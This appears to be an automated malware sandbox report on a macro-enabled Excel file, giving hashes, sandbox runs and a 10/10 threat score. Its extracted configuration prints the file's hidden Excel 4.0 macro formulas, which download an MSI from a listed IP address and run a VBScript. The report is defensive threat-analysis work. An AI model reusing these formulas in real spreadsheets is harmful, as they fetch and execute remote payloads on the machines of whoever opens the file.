General
-
Target
cda018259ed8d767a8cdfc26af5e87ef
-
Size
6KB
-
Sample
231222-r8k8wadfgm
-
MD5
cda018259ed8d767a8cdfc26af5e87ef
-
SHA1
e0a40b056325ce3ad3dc90a17eb17c0640409bb2
-
SHA256
17044a8914cea7bcfaa1ff271edefe5fb0d2b4c6b0c92563cb8be4c436b5bf24
-
SHA512
377255d08df7f2310cc9787329862e85c093b9e3bea6800749466826fa6875cb0b16c75cd9d4d1c2a43b5888100021cda9de8a3bda94aa495e97171a7dfddec6
-
SSDEEP
192:NDSzGuSgbrA2OmmfRn8UhHFBFYu5b98yuVqu+X:NRuxM2wd1FYYb98yuEL
Static task
static1
Behavioral task
behavioral1
Sample
cda018259ed8d767a8cdfc26af5e87ef.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cda018259ed8d767a8cdfc26af5e87ef.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
cda018259ed8d767a8cdfc26af5e87ef
-
Size
6KB
-
MD5
cda018259ed8d767a8cdfc26af5e87ef
-
SHA1
e0a40b056325ce3ad3dc90a17eb17c0640409bb2
-
SHA256
17044a8914cea7bcfaa1ff271edefe5fb0d2b4c6b0c92563cb8be4c436b5bf24
-
SHA512
377255d08df7f2310cc9787329862e85c093b9e3bea6800749466826fa6875cb0b16c75cd9d4d1c2a43b5888100021cda9de8a3bda94aa495e97171a7dfddec6
-
SSDEEP
192:NDSzGuSgbrA2OmmfRn8UhHFBFYu5b98yuVqu+X:NRuxM2wd1FYYb98yuEL
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-